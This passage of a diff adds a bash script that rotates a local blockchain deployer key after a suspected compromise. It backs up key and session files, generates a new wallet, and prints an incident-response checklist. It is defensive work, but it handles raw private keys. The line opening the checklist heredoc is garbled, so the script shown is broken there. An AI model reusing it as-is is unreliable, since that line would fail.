steps you run yourself (sweep BEFORE retiring the old key). +# +# Usage: +# bash scripts/rotate-local-keys.sh # rotate the deployer key (prompts) +# bash scripts/rotate-local-keys.sh --dry-run # show what would happen, change nothing +# bash scripts/rotate-local-keys.sh --yes # no prompt (for a scripted run) + +set -euo pipefail + +AGENTKEYS_HOME="${AGENTKEYS_HOME:-$HOME/.agentkeys}" +DEPLOYER_KEY_FILE="${HEIMA_DEPLOYER_KEY_FILE:-$AGENTKEYS_HOME/heima-deployer.key}" +DRY_RUN=0 +ASSUME_YES=0 + +while [ $# -gt 0 ]; do + case "$1" in + --dry-run) DRY_RUN=1; shift ;; + --yes|-y) ASSUME_YES=1; shift ;; + --help|-h) sed -n '2,/^set -euo/p' "$0" | sed 's/^# \{0,1\}//' | sed '$d'; exit 0 ;; + *) echo "unknown flag: $1 (try --help)" >&2; exit 1 ;; + esac +done + +if [ -t 1 ]; then + C_HEAD='\033[1;36m'; C_OK='\033[1;32m'; C_WARN='\033[1;33m'; C_ERR='\033[1;31m'; C_RESET='\033[0m' +else + C_HEAD=''; C_OK=''; C_WARN=''; C_ERR=''; C_RESET='' +fi +log() { printf "${C_HEAD}==>${C_RESET} %s\n" "$*"; } +ok() { printf " ${C_OK}ok${C_RESET} %s\n" "$*"; } +warn() { printf " ${C_WARN}!!${C_RESET} %s\n" "$*"; } +die() { printf " ${C_ERR}fail${C_RESET} %s\n" "$*" >&2; exit 1; } + +command -v cast >/dev/null 2>&1 || die "cast (foundry) required — install foundry" +[ -d "$AGENTKEYS_HOME" ] || die "no $AGENTKEYS_HOME — nothing to rotate" + +TS="$(date -u +%Y%m%dT%H%M%SZ)" +BACKUP_DIR="$AGENTKEYS_HOME/.compromised-backup-$TS" + +log "Local key rotation — $AGENTKEYS_HOME (backup → $BACKUP_DIR)" +[ "$DRY_RUN" = "1" ] && warn "DRY RUN — no files written" + +# ── 1. Back up EVERY key/jwt/session file (never delete) ─────────────────────── +mapfile -t KEYFILES < <(find "$AGENTKEYS_HOME" -maxdepth 3 -type f \ + \( -name '*.key' -o -name '*.jwt' -o -name 'session.json' -o -name '*-deployer.key' \) 2>/dev/null | sort) +if [ "${#KEYFILES[@]}" -eq 0 ]; then warn "no key files found under $AGENTKEYS_HOME"; fi +if [ "$DRY_RUN" = "0" ]; then mkdir -p "$BACKUP_DIR"; chmod 700 "$BACKUP_DIR"; fi +for f in "${KEYFILES[@]}"; do + rel="${f#"$AGENTKEYS_HOME"/}" + if [ "$DRY_RUN" = "0" ]; then + mkdir -p "$BACKUP_DIR/$(dirname "$rel")"; cp -p "$f" "$BACKUP_DIR/$rel"; chmod 600 "$BACKUP_DIR/$rel" + fi + ok "backed up $rel" +done + +# ── 2. Rotate the DEPLOYER key (critical) ────────────────────────────────────── +if [ -f "$DEPLOYER_KEY_FILE" ]; then + OLD_RAW="$(tr -d '[:space:]' < "$DEPLOYER_KEY_FILE")" + OLD_PK="$OLD_RAW"; case "$OLD_PK" in 0x*) ;; *) OLD_PK="0x$OLD_PK" ;; esac + OLD_ADDR="$(cast wallet address --private-key "$OLD_PK" 2>/dev/null || echo '??')" + HAD_0X=0; case "$OLD_RAW" in 0x*) HAD_0X=1 ;; esac + log "Deployer key: $DEPLOYER_KEY_FILE (old address $OLD_ADDR)" + warn "This address is the gas payer AND the SidecarRegistry owner. SWEEP ITS FUNDS FIRST." + if [ "$ASSUME_YES" = "0" ] && [ "$DRY_RUN" = "0" ]; then + printf " rotate the deployer key now? old key is backed up. [y/N] "; read -r ans + case "$ans" in y|Y|yes) ;; *) die "aborted — no key rotated (backup kept)"; esac + fi + NEW_JSON="$(cast wallet new --json 2>/dev/null)" + NEW_PK="$(printf '%s' "$NEW_JSON" | sed -n 's/.*"private_key":"\([^"]*\)".*/\1/p')" + NEW_ADDR="$(printf '%s' "$NEW_JSON" | sed -n 's/.*"address":"\([^"]*\)".*/\1/p')" + [ -n "$NEW_PK" ] && [ -n "$NEW_ADDR" ] || die "cast wallet new produced no keypair" + OUT="$NEW_PK"; [ "$HAD_0X" = "0" ] && OUT="${NEW_PK#0x}" # preserve the file's 0x-or-bare format + if [ "$DRY_RUN" = "0" ]; then (umask 077 && printf '%s\n' "$OUT" > "$DEPLOYER_KEY_FILE"); chmod 600 "$DEPLOYER_KEY_FILE"; fi + ok "deployer key ROTATED → new address $NEW_ADDR" + echo + printf "${C_WARN} NEW DEPLOYER ADDRESS: %s${C_RESET}\n" "$NEW_ADDR" + printf " OLD (retire after sweeping): %s\n" "$OLD_ADDR" +else + warn "no deployer key at $DEPLOYER_KEY_FILE — skipping deployer rotation" +fi + +# ── 3. Flag the OTHER key files (not auto-rotated) ───────────────────────────── +echo +log "Other local keys — review/rotate MANUALLY (rotating these needs a re-pair):" +for f in "${KEYFILES[@]}"; do + rel="${f#"$AGENTKEYS_HOME"/}" + case "$rel" in + "${DEPLOYER_KEY_FILE#"$AGENTKEYS_HOME"/}") ;; # already done + *agent-device.key) warn "$rel — agent K10; regenerate ⇒ the agent must RE-PAIR (registerAgentDevice is keyed to the old K10)" ;; + *.jwt|*session.json) warn "$rel — session bearer; revoke/re-issue via re-onboard (not a keypair)" ;; + *) warn "$rel — review: rotate if it's a standalone secret" ;; + esac +done + +# ── 4. Post-rotation checklist ───────────────────────────────────────────────── +cat <${C_RESET}") Post-rotation checklist (do these yourself — see docs/security-incident-response.md §2a): + 1. Sweep funds: send all HEI from the OLD deployer ($OLD_ADDR) to the NEW one + (cast send --value --private-key \$(cat $BACKUP_DIR/...) ...). Old key still works. + 2. Re-fund the NEW deployer; update scripts/operator-workstation.env if the address is referenced. + 3. Re-own the registry: the owner is the OLD deployer (no transferOwnership). Either keep it + (old key swept + retired) or redeploy: FORCE_DEPLOY=1 bash scripts/heima-bring-up.sh + → commit heima.json + operator-workstation.env → setup-broker-host.sh --ref main. + 4. Push the new key into the GitHub secret: bash scripts/rotate-github-secrets.sh (TEST_HEIMA_DEPLOYER_KEY). + 5. Securely delete the backup once you have confirmed the new key works AND the old is swept: + rm -rf "$BACKUP_DIR" +EOF